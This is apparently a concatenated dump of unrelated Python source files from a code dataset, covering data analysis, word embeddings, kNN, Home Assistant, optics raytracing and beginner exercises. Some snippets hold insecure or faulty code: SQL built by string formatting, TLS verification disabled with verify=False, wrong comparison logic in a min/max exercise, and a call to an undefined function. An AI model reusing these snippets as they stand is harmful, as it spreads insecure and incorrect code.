d[p][0.25]:\r\n return 4\r\n elif x <= d[p][0.50]:\r\n return 3\r\n elif x <= d[p][0.75]:\r\n return 2\r\n else:\r\n return 1\r\n\r\nsegmented_rfm['r_quartile'] = segmented_rfm['LastVisited'].apply(RScore, args=('LastVisited',quantiles,))\r\nsegmented_rfm['f_quartile'] = segmented_rfm['TotalVisit'].apply(FMScore, args=('TotalVisit',quantiles,))\r\nsegmented_rfm['m_quartile'] = segmented_rfm['TotalAmount'].apply(FMScore, args=('TotalAmount',quantiles,))\r\n\r\nprint(segmented_rfm.head())\r\n\r\nsegmented_rfm['RFMScore'] = segmented_rfm.r_quartile.map(str) + segmented_rfm.f_quartile.map(str) \\\r\n + segmented_rfm.m_quartile.map(str)\r\n\r\nconn, curs = connectDB()\r\nfor index, item in segmented_rfm[segmented_rfm['RFMScore'] <= '444'].sort_values('TotalAmount', ascending=False).iterrows():\r\n SQL = \"\"\"INSERT INTO foodfie_analysis.RFM(CustomerId, Frequency, Recently, Monetary, R, F, M, RFMScore)\r\n VALUES({0}, {1}, {2}, {3}, {4}, {5}, {6}, '{7}')\r\n \"\"\".format(int(index), int(item['TotalVisit']), int(item['LastVisited']), int(item['TotalAmount']),\r\n int(item['r_quartile']), int(item['f_quartile']), int(item['m_quartile']), str(item['RFMScore']))\r\n curs.execute(SQL)\r\n conn.commit()\r\n\r\n\r\n\r\n# \"\"\"Get set go to take \"MOMOS BEYOND MOMOS\" with Foodfie!!! The much awaited Momos food festival, MOMOIESTA 2018 has kickstarted around you. The week long fest promises to be delightful for the momos lovers.Come and pamper your tastebuds.\r\n# Highlight of event:\r\n# Pasta momos
Momos 65\u2028Momos chaat\u2028Oreo momos\u2028Chocolate momos\u2028Cheese and Corn\u2028Burger momos\u2028Kurkure momos\u2028Gravy momos\u2028Afghai momos to steamed momos\u2028
there will be all sorts of striking fusion momos.\r\n#\r\n# Venue: Foodfie Candor Infospace and Infotch\r\n# Date: 9th April 2018 to 13th April 2018.\"\"\"\r\n","sub_path":"Analysis/RFM.py","file_name":"RFM.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"161242042","text":"\nl1 = [1, 2, 3, 4, 5,]\nex1 = [v for v in l1]\n#print(ex1)\nex2 = [v * 2 for v in l1]\n#print(ex2)\nex3 = [(v, v2) for v in l1 for v2 in range(3)]\n#print(ex3)\n\nl2 = ['luiz', 'mauro', 'maria']\nex4 = [var.replace('a', '@').upper() for var in l2]\n#print(ex4)\n\ntupla = (\n ('chave1', 'valor1'),\n ('chave2', 'valor2')\n)\n#ex5 = [(x, y) for x, y in tupla]\n#invertendo chave x valo:\nex5 = [(y, x) for x, y in tupla]\n#print(ex5)\nex5 = dict(ex5)\nprint(ex5['valor2'])\n\nl3 = list(range(10))\n#ex6 = [v for v in l3 if v % 2 == 0 if v % 3 == 0 if v % 8 == 0]\n#print(ex6)\nex7 = [v if v % 2 == 0 and v % 8 == 0 else '' for v in l3]\n#print(ex7)\n\nexe8 = '0123456789012345678901234567890123456789012345678901234567890123456789'\nn = 10\n#tupla\n#solucao = [exe8 (i, i + n) for i in range(0, len(exe8), n)]\n#lista\nsolucao = [exe8[i: i + n] for i in range(0, len(exe8), n)]\nsolucao = '.'.join(solucao)\nprint(solucao)\n\n","sub_path":"intermediario/list_comprehension.py","file_name":"list_comprehension.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"71939045","text":"import numpy as np\n\ndef readtospc(f):\n\n s = bytearray()\n ch = f.read(1)\n\n while ch != b'\\x20':\n s.extend(ch)\n ch = f.read(1)\n s = s.decode('utf-8')\n return s.strip()\n\nclass Word2VecModel:\n\n def __init__(self, filename, knownvocab=None, unifweight=None):\n\n uw = 0.0 if unifweight == None else unifweight\n self.vocab = {}\n self.vocab[\"\"] = 0\n with open(filename, \"rb\") as f:\n header = f.readline()\n vsz, self.dsz = map(int, header.split())\n\n if knownvocab is not None:\n self.vsz = 0\n for v in knownvocab:\n self.vsz += 1\n else:\n self.vsz = vsz\n\n self.weights = np.random.uniform(-uw, uw, (self.vsz+1, self.dsz))\n width = 4 * self.dsz\n k = 1\n # All attested word vectors\n for i in range(vsz):\n word = readtospc(f)\n raw = f.read(width)\n # If vocab list, not in: dont add, in:add, drop from list\n if word in self.vocab:\n continue\n\n if knownvocab is not None:\n if word not in knownvocab:\n continue\n\n # Otherwise drop freq to 0, for later\n knownvocab[word] = 0\n vec = np.fromstring(raw, dtype=np.float32)\n self.weights[k] = vec\n self.vocab[word] = k\n k = k + 1\n\n # Anything left over, unattested in w2v model, just use a random\n # initialization\n if knownvocab is not None:\n unknown = {v: cnt for v,cnt in knownvocab.items() if cnt > 0}\n for v in unknown:\n self.vocab[v] = k\n k = k + 1\n\n self.nullv = np.zeros(self.dsz, dtype=np.float32)\n self.weights[0] = self.nullv\n\n def lookup(self, word, nullifabsent=True):\n if word in self.vocab:\n return self.weights[self.vocab[word]]\n if nullifabsent:\n return None\n return self.nullv\n\nclass RandomInitVecModel:\n\n def __init__(self, dsz, knownvocab, counts=True, unifweight=None):\n\n uw = 0.0 if unifweight == None else unifweight\n self.vocab = {}\n self.vocab[\"\"] = 0\n self.dsz = dsz\n self.vsz = 0\n\n if counts is True:\n attested = {v: cnt for v,cnt in knownvocab.items() if cnt > 0}\n for k,v in enumerate(attested):\n self.vocab[v] = k\n k = k + 1\n self.vsz += 1\n else:\n 
print('Restoring existing vocab')\n self.vocab = knownvocab\n self.vsz = len(self.vocab) - 1\n\n self.weights = np.random.uniform(-uw, uw, (self.vsz+1, self.dsz))\n\n self.nullv = np.zeros(self.dsz, dtype=np.float32)\n self.weights[0] = self.nullv\n\n def lookup(self, word, nullifabsent=True):\n if word in self.vocab:\n return self.weights[self.vocab[word]]\n if nullifabsent:\n return None\n return self.nullv\n\nif __name__ == '__main__':\n w2v = Word2VecModel('/data/xdata/GoogleNews-vectors-negative300.bin')\n\n print(w2v.lookup('agjasgoikjagolkjajgr', False))\n print(w2v.lookup('agjasgoikjagolkjajgr', True))\n print(w2v.lookup('Daniel'))\n","sub_path":"seq2seq/python/w2v.py","file_name":"w2v.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"510689218","text":"import numpy as np\nfrom sklearn import neighbors\n\ndef load_data(filename):\n f = open(filename)\n lines = f.readlines()\n dataMat = np.zeros((len(lines), 3))\n classLabel = []\n for i in range(len(lines)):\n line = lines[i].strip().split(\"\\t\")\n dataMat[i, :] = line[0:3]\n classLabel.append(int(line[-1]))\n return dataMat, classLabel\n\ndef norm_data(dataMat):\n minVals = dataMat.min(axis=0)\n maxVals = dataMat.max(axis=0)\n ranges = maxVals - minVals\n normddata = (dataMat - minVals) / ranges\n return normddata, ranges, minVals\n\nif __name__ == \"__main__\":\n dataMat, classLabel = load_data(\"dataset.txt\")\n dataMat, ranges, minVals = norm_data(dataMat)\n k = 3\n clf = neighbors.KNeighborsClassifier(k, weights='uniform')\n clf.fit(dataMat, classLabel)\n resultList = ['not at all', 'in small doses', 'in large doses']\n percentTats = float(input(\"percentage of time spent playing video games ?\"))\n ffMiles = float(input(\"frequent filer miles earned per year?\"))\n iceCream = float(input(\"liters of ice cream consumed per year?\"))\n inArr = np.array([[ffMiles, percentTats, iceCream]])\n classifierResult = clf.predict((inArr-minVals)/ranges)\n print(\"You will probably like this person: \", resultList[classifierResult[0] - 1])\n","sub_path":"ML/src/chapter2/example1/sklearn_solve.py","file_name":"sklearn_solve.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"101533746","text":"'''\nあえて二重ループを使わない解法\n'''\n\n(N,Y) = [int(i) for i in input().split()]\n\n# y10k: 1万円札の枚数\n# y5k: 5千円札の枚数\n# y1k: 千円札の枚数\n\n# 暫定的に最も少ない枚数で設定金額を達成する\ny10k = Y // 10000\ny5k, y1k = divmod((Y%10000)/1000, 5)\n\n# 暫定的な総枚数\ncurrent_inbag = y10k+y5k+y1k\n# 設定枚数との差\ndiff = N - current_inbag\n \n# 以後、金額を変えずにdiffを減らすように両替していく\n\n# そもそもおかしいとき\nif Y > 10000*N or Y < 1000*N or diff < 0:\n print('-1 -1 -1')\n exit()\n\n# 1万円札 -> 千円札10枚\nwhile y10k > 0 and diff >= 9:\n y10k -= 1\n y1k += 10\n diff -= 9\n\n# 1万円札 -> 5千円札1枚+千円札5枚\nif y10k > 0 and diff >= 5:\n y10k -= 1\n y5k += 1\n y1k += 5\n diff -= 5\n\n# 1万円札 -> 5千円札2枚\n# 差の枚数を1枚ずつ刻めるの\nwhile y10k > 0 and diff > 0:\n y10k -= 1\n y5k += 2\n diff -= 1\n\n# 先に1万円札がなくなったとき\n# 5千円札 -> 千円札5枚\nif y10k == 0 and diff > 0:\n while y5k > 0 and diff >= 4:\n y5k -= 1\n y1k += 5\n diff -= 4\n\nif diff == 0:\n print('%d %d %d' % (y10k,y5k,y1k))\n exit()\n\nprint('-1 -1 -1')","sub_path":"AtCoder/ABC085C.py","file_name":"ABC085C.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"572509879","text":"#!/usr/bin/env python\nimport 
requests\nfrom json import loads\n\nimport yaml\nfrom colorama import init, Fore\n\nimport os\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\ninit()\nduration = 1\nfreq = 440\n\nwith open(dir_path + \"/config.yaml\") as f:\n docs = yaml.load_all(f, Loader=yaml.FullLoader)\n for doc in docs:\n for k, v in doc.items():\n if k == 'purple':\n purple_set = v\n elif k == 'green':\n green_set = v\n elif k == 'site':\n site = v\n\nresponse = requests.get(str(site), verify=False)\nfeed = loads(response.content)\nportals = feed['portals']\ndata = feed['locations']\nportal_dict = {}\n\nfor portal in portals:\n portal_dict[portal['key']] = portal['url']\n\ndef json_extract(obj, key):\n arr = []\n\n def extract(obj, arr, key):\n if isinstance(obj, dict):\n for k, v in obj.items():\n if isinstance(v, (dict, list)):\n extract(v, arr, key)\n elif k == key:\n arr.append(v)\n elif isinstance(obj, list):\n for item in obj:\n extract(item, arr, key)\n return arr\n\n values = extract(obj, arr, key)\n return values\n\n\ncount = 0\navailable_count = 0\nfor line in data:\n # print(str(line))\n # print(portal_dict[line['portal']])\n # continue\n\n available = line['available']\n if available is True:\n purple_found = False\n green_found = False\n for purple in purple_set:\n if (line['name'].find(purple) != -1):\n purple_found = True\n for green in green_set:\n if (line['name'].find(green) != -1):\n green_found = True\n prefix = Fore.MAGENTA if purple_found else Fore.RESET\n if purple_found:\n prefix = Fore.MAGENTA\n elif green_found:\n prefix = Fore.GREEN\n else:\n prefix = Fore.RESET\n\n\n print(prefix + line['name'])\n print(prefix + line['area'])\n print(prefix + portal_dict[line['portal']])\n print(prefix + str(line['appointments']['count']) + \" appointment slots available\")\n available_count = available_count + line['appointments']['count']\n print(prefix + str(line['appointments']['summary']))\n print()\n if count == 2:\n count = 0\nif available_count > 0:\n print(\"Available appointments total: \" + str(available_count))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"219783721","text":"#!/usr/bin/env python3\n\"\"\"Support for Tuya switches.\"\"\"\nfrom __future__ import annotations\n\nimport logging\nfrom typing import Any\n\nfrom tuya_iot import TuyaDevice, TuyaDeviceManager\n\nfrom homeassistant.components.switch import DOMAIN as DEVICE_DOMAIN, SwitchEntity\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.dispatcher import async_dispatcher_connect\n\nfrom .base import TuyaHaDevice\nfrom .const import (\n DOMAIN,\n TUYA_DEVICE_MANAGER,\n TUYA_DISCOVERY_NEW,\n TUYA_HA_DEVICES,\n TUYA_HA_TUYA_MAP,\n)\n\n_LOGGER = logging.getLogger(__name__)\n\nTUYA_SUPPORT_TYPE = {\n \"kg\", # Switch\n \"cz\", # Socket\n \"pc\", # Power Strip\n \"cwysj\", # Pet Water Feeder\n}\n\n# Switch(kg), Socket(cz), Power Strip(pc)\n# https://developer.tuya.com/docs/iot/open-api/standard-function/electrician-category/categorykgczpc?categoryId=486118\nDPCODE_SWITCH = \"switch\"\nDPCODE_UV = \"uv\"\n\n\nasync def async_setup_entry(\n hass: HomeAssistant, _entry: ConfigEntry, async_add_entities\n):\n \"\"\"Set up tuya sensors dynamically through tuya discovery.\"\"\"\n _LOGGER.info(\"switch init\")\n\n hass.data[DOMAIN][TUYA_HA_TUYA_MAP].update({DEVICE_DOMAIN: TUYA_SUPPORT_TYPE})\n\n async def 
async_discover_device(dev_ids):\n \"\"\"Discover and add a discovered tuya sensor.\"\"\"\n _LOGGER.info(f\"switch add-> {dev_ids}\")\n if not dev_ids:\n return\n entities = await hass.async_add_executor_job(_setup_entities, hass, dev_ids)\n hass.data[DOMAIN][TUYA_HA_DEVICES].extend(entities)\n async_add_entities(entities)\n\n async_dispatcher_connect(\n hass, TUYA_DISCOVERY_NEW.format(DEVICE_DOMAIN), async_discover_device\n )\n\n device_manager = hass.data[DOMAIN][TUYA_DEVICE_MANAGER]\n device_ids = []\n for (device_id, device) in device_manager.device_map.items():\n if device.category in TUYA_SUPPORT_TYPE:\n device_ids.append(device_id)\n await async_discover_device(device_ids)\n\n\ndef _setup_entities(hass, device_ids: list):\n \"\"\"Set up Tuya Switch device.\"\"\"\n device_manager = hass.data[DOMAIN][TUYA_DEVICE_MANAGER]\n entities = []\n for device_id in device_ids:\n device = device_manager.device_map[device_id]\n if device is None:\n continue\n\n for function in device.function:\n if function.startswith(DPCODE_SWITCH):\n entities.append(TuyaHaSwitch(device, device_manager, function))\n continue\n\n if function == DPCODE_UV:\n entities.append(TuyaHaSwitch(device, device_manager, function))\n\n return entities\n\n\nclass TuyaHaSwitch(TuyaHaDevice, SwitchEntity):\n \"\"\"Tuya Switch Device.\"\"\"\n\n dp_code_switch = DPCODE_SWITCH\n\n def __init__(\n self, device: TuyaDevice, device_manager: TuyaDeviceManager, dp_code: str = \"\"\n ) -> None:\n \"\"\"Init TuyaHaSwitch.\"\"\"\n super().__init__(device, device_manager)\n\n self.dp_code = dp_code\n self.channel = (\n dp_code.replace(DPCODE_SWITCH, \"\")\n if dp_code.startswith(DPCODE_SWITCH)\n else dp_code\n )\n\n @property\n def unique_id(self) -> str | None:\n \"\"\"Return a unique ID.\"\"\"\n return f\"{super().unique_id}{self.channel}\"\n\n @property\n def name(self) -> str | None:\n \"\"\"Return Tuya device name.\"\"\"\n return self.tuya_device.name + self.channel\n\n @property\n def is_on(self) -> bool:\n \"\"\"Return true if switch is on.\"\"\"\n return self.tuya_device.status.get(self.dp_code, False)\n\n def turn_on(self, **kwargs: Any) -> None:\n \"\"\"Turn the switch on.\"\"\"\n self._send_command([{\"code\": self.dp_code, \"value\": True}])\n\n def turn_off(self, **kwargs: Any) -> None:\n \"\"\"Turn the device off.\"\"\"\n self._send_command([{\"code\": self.dp_code, \"value\": False}])\n","sub_path":"custom_components/tuya_v2/switch.py","file_name":"switch.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"354504595","text":"numero_1 = int(input('Primeiro número: '))\nnumero_2 = int(input('Segundo número: '))\nnumero_3 = int(input('Terceiro número: '))\n\nif numero_1 < numero_2 and numero_3:\n menor = numero_1\nelif numero_2 < numero_1 and numero_3:\n menor = numero_2\nelse:\n menor = numero_3\n\nif numero_1 > numero_2 and numero_3:\n maior = numero_1\nelif numero_2 > numero_1 and numero_3:\n maior = numero_2\nelse:\n maior = numero_3\n\nprint('\\nMaior: {}\\nMenor: {}'.format(maior, menor))\n\n","sub_path":"ex032.py","file_name":"ex032.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"651303902","text":"# <>\n# Copyright (c) 2016, Lawrence Livermore National Security, LLC.\n# Produced at the Lawrence Livermore National Laboratory.\n# Written by the LLNL Nuclear Data and Theory group\n# (email: mattoon1@llnl.gov)\n# 
LLNL-CODE-683960.\n# All rights reserved.\n# \n# This file is part of the FUDGE package (For Updating Data and \n# Generating Evaluations)\n# \n# When citing FUDGE, please use the following reference:\n# C.M. Mattoon, B.R. Beck, N.R. Patel, N.C. Summers, G.W. Hedstrom, D.A. Brown, \"Generalized Nuclear Data: A New Structure (with Supporting Infrastructure) for Handling Nuclear Data\", Nuclear Data Sheets, Volume 113, Issue 12, December 2012, Pages 3145-3171, ISSN 0090-3752, http://dx.doi.org/10. 1016/j.nds.2012.11.008\n# \n# \n# Please also read this link - Our Notice and Modified BSD License\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the disclaimer below.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the disclaimer (as noted below) in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of LLNS/LLNL nor the names of its contributors may be used\n# to endorse or promote products derived from this software without specific\n# prior written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL SECURITY, LLC,\n# THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n# \n# \n# Additional BSD Notice\n# \n# 1. This notice is required to be provided under our contract with the U.S.\n# Department of Energy (DOE). This work was produced at Lawrence Livermore\n# National Laboratory under Contract No. DE-AC52-07NA27344 with the DOE.\n# \n# 2. Neither the United States Government nor Lawrence Livermore National Security,\n# LLC nor any of their employees, makes any warranty, express or implied, or assumes\n# any liability or responsibility for the accuracy, completeness, or usefulness of any\n# information, apparatus, product, or process disclosed, or represents that its use\n# would not infringe privately-owned rights.\n# \n# 3. Also, reference herein to any specific commercial products, process, or services\n# by trade name, trademark, manufacturer or otherwise does not necessarily constitute\n# or imply its endorsement, recommendation, or favoring by the United States Government\n# or Lawrence Livermore National Security, LLC. 
The views and opinions of authors expressed\n# herein do not necessarily state or reflect those of the United States Government or\n# Lawrence Livermore National Security, LLC, and shall not be used for advertising or\n# product endorsement purposes.\n# \n# <>\n\n\"\"\"\nThis module contains useful fudge math routines that do not fit into any other module.\n\"\"\"\n\nfrom pqu import PQU\nfrom fudge.core.utilities import brb\ntry :\n import numpy\n numpyFloat64 = numpy.float64( 1. )\nexcept :\n numpyFloat64 = 1.\n\n__metaclass__ = type\n\ndef runningZSum( data, xLabel = None, yLabel = None, zLabel = None, normalize = False ) :\n \"\"\"Returns the running sum of dy * z (normalized to 1 of normalize is True) for each x as an endl3dmath object.\n Data must be list of ( x, list of ( y, z ) ).\"\"\"\n\n d3 = []\n for x_yz in data : d3.append( [ x_yz[0], runningYSum( x_yz[1], normalize = normalize ).data ] )\n from fudge.legacy.endl import endl3dmathClasses\n return endl3dmathClasses.endl3dmath( d3, xLabel = xLabel, yLabel = yLabel, zLabel = zLabel, checkDataType = 0 )\n\ndef runningYSum( data, normalize = False ) :\n \"\"\"Returns the running sum of dx * y (normalized to 1 of normalize is True) as an endl2dmath object. \n Data must be list of ( x, y ).\"\"\"\n\n x1 = None\n runningSum = []\n for xy in data :\n x2 = xy[0]\n y2 = xy[1]\n if ( x1 == None ) :\n Sum = 0.\n else :\n Sum += 0.5 * ( y2 + y1 ) * ( x2 - x1 )\n runningSum.append( [ x2, Sum ] )\n x1 = x2\n y1 = y2\n if( normalize and ( Sum != 0. ) ) :\n for xy in runningSum : xy[1] /= Sum\n from fudge.legacy.endl import endl2dmathClasses\n return endl2dmathClasses.endl2dmath( runningSum, checkDataType = 0 )\n\ndef ZSum( data ) :\n \"\"\"Returns the area under the curve z(y) for each x as an endl2dmath object. Data must be list of\n ( x, list of ( y, z ) ).\"\"\"\n\n d2 = []\n for x_yz in data : d2.append( [ x_yz[0], YSum( x_yz[1] ) ] )\n from fudge.legacy.endl import endl2dmathClasses\n return endl2dmathClasses.endl2dmath( d2, checkDataType = 0 )\n\ndef YSum( data ) :\n \"Returns the area under the curve y(x). Data must be list of list( x, y ).\"\n\n x1 = None\n for x2, y2 in data :\n if ( x1 == None ) :\n Sum = 0.\n else :\n Sum += ( y2 + y1 ) * ( x2 - x1 )\n x1 = x2\n y1 = y2\n return 0.5 * Sum\n\nclass fastSumOfManyAddends :\n \"\"\"This class in designed to sum a lot of endl2dmath or fudge2dmath object together efficiently. For example,\n consider the list f2d of 100,000 fudge2dmath objects that are to be summed. One way to do this is as\n s = fudge2dmath( )\n for f in f2d : s = s + f\n\n In general, this is very inefficient and will take a long time. 
Using, this class as\n\n fs = fastSumOfManyAddends( )\n for f in f2d : fs.appendAddend( f )\n s = fs.returnSum( )\n\n is, in general, much more efficient (i.e., runs a lot faster) and it should never be less efficient.\n\n While this class was designed for endl2dmath and fudge2dmath objects, it should work for any object\n for which the '+' operation is defined.\"\"\"\n\n def __init__( self ) :\n \"\"\"Constructor for fastSumOfManyAddends.\"\"\"\n\n self.clear( )\n\n def appendAddend( self, addend ) :\n \"\"\"Adds addend to current sum efficiently.\"\"\"\n\n n = len( self.list )\n for i in xrange( n ) :\n if( self.list[i] == None ) :\n self.list[i] = addend\n addend = None\n break\n else :\n addend = addend + self.list[i]\n self.list[i] = None\n if( addend != None ) : self.list.append( addend )\n\n def clear( self ) :\n \"\"\"Clears currently summed data.\"\"\"\n\n self.list = []\n\n def returnSum( self ) :\n \"\"\"Returns the current sum of all addends appended.\"\"\"\n\n s = None\n for l in self.list :\n if( l != None ) :\n if( s == None ) :\n s = l\n else :\n s = s + l\n return( s )\n\ndef getValue( n ) :\n\n if( isNumber( n ) ) : return( n )\n if( isinstance( n, PQU.PQU ) ) : return( n.getValue( ) )\n raise Exception( 'Invalue number object = %s' % brb.getType( n ) )\n","sub_path":"fudge/legacy/endl/endlmath.py","file_name":"endlmath.py","file_ext":"py","file_size_in_byte":7646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"417215874","text":"print(\"Let's see if we can get this sorted\")\nfixed = False\nprint(\"Turn Your Computer On\")\n\ndef plugged_in():\n plugged_in = input(\"Is it plugged in(y/n)? \")\n return plugged_in == \"y\"\n\ndef plug_it_in():\n print(\"Plug it in\")\n working = input(\"Did this fix the problem(y/n)? \")\n return working == \"y\"\n\nstatus = input(\"Did it boot up (y/n)? \")\nif status == \"y\":\n fixed = True\nelif not plugged_in():\n if plug_it_in():\n fixed = True\n\nif fixed == True:\n print(\"Login with password\")\nelse:\n print(\"Your computer is broken\")\n\nprint(\"Done\")\n","sub_path":"week_01/day_2/conditionals_lab/solution_functions.py","file_name":"solution_functions.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"643665953","text":"from .matrixgroup import *\nfrom .imagingpath import *\n\n\nclass LaserPath(MatrixGroup):\n \"\"\"LaserPath: the main class of the module for coherent\n laser beams: it is the combination of Matrix() or MatrixGroup()\n to be used as a laser path with a laser beam (GaussianBeam)\n at the entrance.\n\n Usage is to create the LaserPath(), then append() elements\n and display(). You may change the inputBeam to any GaussianBeam(),\n or provide one to display(beam=GaussianBeam())\n\n Gaussian laser beams are not \"blocked\" by aperture. The formalism\n does not explicitly allow that. 
However, if it appears that a \n GaussianBeam() would be clipped by finite aperture, a property \n is set to indicate it, but it will propagate nevertheless\n and without diffraction due to that aperture.\n \"\"\"\n\n def __init__(self, elements=None, label=\"\"):\n self.inputBeam = None\n self.isResonator = False\n self.showElementLabels = True\n self.showPointsOfInterest = True\n self.showPointsOfInterestLabels = True\n self.showPlanesAcrossPointsOfInterest = True\n super(LaserPath, self).__init__(elements=elements, label=label)\n\n def eigenModes(self):\n \"\"\"\n Returns the two complex radii that are identical after a\n round trip, assuming the matrix of the LaserPath() is one\n round trip: you will need to duplicate elements in reverse\n and append them manually. \n \"\"\"\n if not self.hasPower:\n return None, None\n\n b = self.D - self.A\n sqrtDelta = cmath.sqrt(b * b + 4.0 * self.B * self.C)\n\n q1 = (- b + sqrtDelta) / (2.0 * self.C)\n q2 = (- b - sqrtDelta) / (2.0 * self.C)\n\n return (GaussianBeam(q=q1), GaussianBeam(q=q2))\n\n def laserModes(self):\n \"\"\"\n Returns the laser modes that are physical (finite) when \n calculating the eigenmodes. \n \"\"\"\n\n (q1, q2) = self.eigenModes()\n q = []\n if q1 is not None and q1.isFinite:\n q.append(q1)\n\n if q2 is not None and q2.isFinite:\n q.append(q2)\n\n return q\n\n def display(self, inputBeam=None, inputBeams=None, comments=None): # pragma: no cover\n \"\"\" Display the optical system and trace the laser beam. \n If comments are included they will be displayed on a\n graph in the bottom half of the plot.\n\n \"\"\"\n\n if self.isResonator:\n beams = self.laserModes()\n if self.label == \"\":\n self.label = \"Laser modes as calculated\"\n elif inputBeam is not None:\n beams = [inputBeam]\n elif inputBeams is not None:\n beams = inputBeams\n else:\n beams = [self.inputBeam]\n\n if self.label == \"\":\n self.label = \"User-specified gaussian beams\"\n\n if comments is not None:\n fig, (axes, axesComments) = plt.subplots(2, 1, figsize=(10, 7))\n axesComments.axis('off')\n axesComments.text(0., 1.0, comments, transform=axesComments.transAxes,\n fontsize=10, verticalalignment='top')\n else:\n fig, axes = plt.subplots(figsize=(10, 7))\n\n self.createBeamTracePlot(axes=axes, beams=beams)\n\n self._showPlot()\n\n def createBeamTracePlot(self, axes, beams): # pragma: no cover\n \"\"\" Create a matplotlib plot to draw the laser beam and the elements.\n \"\"\"\n\n displayRange = 2 * self.largestDiameter()\n if displayRange == float('+Inf'):\n displayRange = self.inputBeam.w * 6\n\n axes.set(xlabel='Distance', ylabel='Height', title=self.label)\n axes.set_ylim([-displayRange / 2 * 1.2, displayRange / 2 * 1.2])\n\n self.drawAt(z=0, axes=axes)\n\n for beam in beams:\n self.drawBeamTrace(axes, beam)\n self.drawWaists(axes, beam)\n\n return axes\n\n def rearrangeBeamTraceForPlotting(self, rayList):\n x = []\n y = []\n for ray in rayList:\n x.append(ray.z)\n y.append(ray.w)\n return (x, y)\n\n def drawBeamTrace(self, axes, beam): # pragma: no cover\n \"\"\" Draw beam trace corresponding to input beam \n Because the laser beam diffracts through space, we cannot\n simply propagate the beam over large distances and trace it\n (as opposed to rays, where we can). 
We must split Space() \n elements into sub elements to watch the beam size expand.\n \n We arbitrarily split Space() elements into N sub elements\n before plotting.\n \"\"\"\n\n N = 100\n highResolution = ImagingPath()\n for element in self.elements:\n if isinstance(element, Space):\n for i in range(N):\n highResolution.append(Space(d=element.L / N,\n n=element.frontIndex))\n else:\n highResolution.append(element)\n\n beamTrace = highResolution.trace(beam)\n (x, y) = self.rearrangeBeamTraceForPlotting(beamTrace)\n axes.plot(x, y, 'r', linewidth=1)\n axes.plot(x, [-v for v in y], 'r', linewidth=1)\n\n def drawWaists(self, axes, beam): # pragma: no cover\n \"\"\" Draws the expected waist (i.e. the focal spot or the spot where the\n size is minimum) for all positions of the beam. This will show \"waists\" that\n are virtual if there is an additional lens between the beam and the expceted\n waist.\n\n It is easy to obtain the waist position from the complex radius of curvature\n because it is the position where the complex radius is imaginary. The position\n returned is relative to the position of the beam, which is why we add the actual\n position of the beam to the relative position. \"\"\"\n\n (xScaling, yScaling) = self.axesToDataScale(axes)\n arrowWidth = xScaling * 0.01\n arrowHeight = yScaling * 0.03\n arrowSize = arrowHeight * 3\n\n beamTrace = self.trace(beam)\n for beam in beamTrace:\n relativePosition = beam.waistPosition\n position = beam.z + relativePosition\n size = beam.waist\n\n axes.arrow(position, size + arrowSize, 0, -arrowSize,\n width=0.1, fc='g', ec='g',\n head_length=arrowHeight, head_width=arrowWidth,\n length_includes_head=True)\n axes.arrow(position, -size - arrowSize, 0, arrowSize,\n width=0.1, fc='g', ec='g',\n head_length=arrowHeight, head_width=arrowWidth,\n length_includes_head=True)\n","sub_path":"raytracing/laserpath.py","file_name":"laserpath.py","file_ext":"py","file_size_in_byte":6660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"441727613","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# cw2.py\n# \n# \n# \n\n\ndef main(args):\n\t\n\t\n\t\n\t\n\t\n\tn = int(input(\"Podaj liczbę naturalną \")) #Program pobiera cyfrę n\n\twhile n < 0: #Sprawdza czy jest ona naturalna jeżeli nie powiadami o tym i 